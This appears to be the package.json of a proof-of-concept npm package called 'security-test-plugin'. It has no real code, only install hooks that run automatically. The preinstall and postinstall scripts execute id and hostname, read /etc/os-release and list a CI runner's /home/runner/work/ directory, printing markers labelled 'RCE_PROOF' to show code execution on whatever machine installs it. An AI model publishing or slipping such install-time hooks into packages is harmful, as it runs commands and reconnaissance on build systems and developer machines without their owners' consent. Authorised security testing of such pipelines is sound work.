{
  "name": "security-test-plugin",
  "version": "1.0.0",
  "description": "Security research",
  "scripts": {
    "preinstall": "echo '=== RCE_PROOF_START ===' && id && hostname && echo '=== RCE_PROOF_END ===' >&2",
    "postinstall": "echo '=== POSTINSTALL_RCE_PROOF ===' && id && cat /etc/os-release | head -3 && ls -la /home/runner/work/ 2>/dev/null && echo '=== END_POSTINSTALL_PROOF ===' >&2"
  },
  "license": "MIT"
}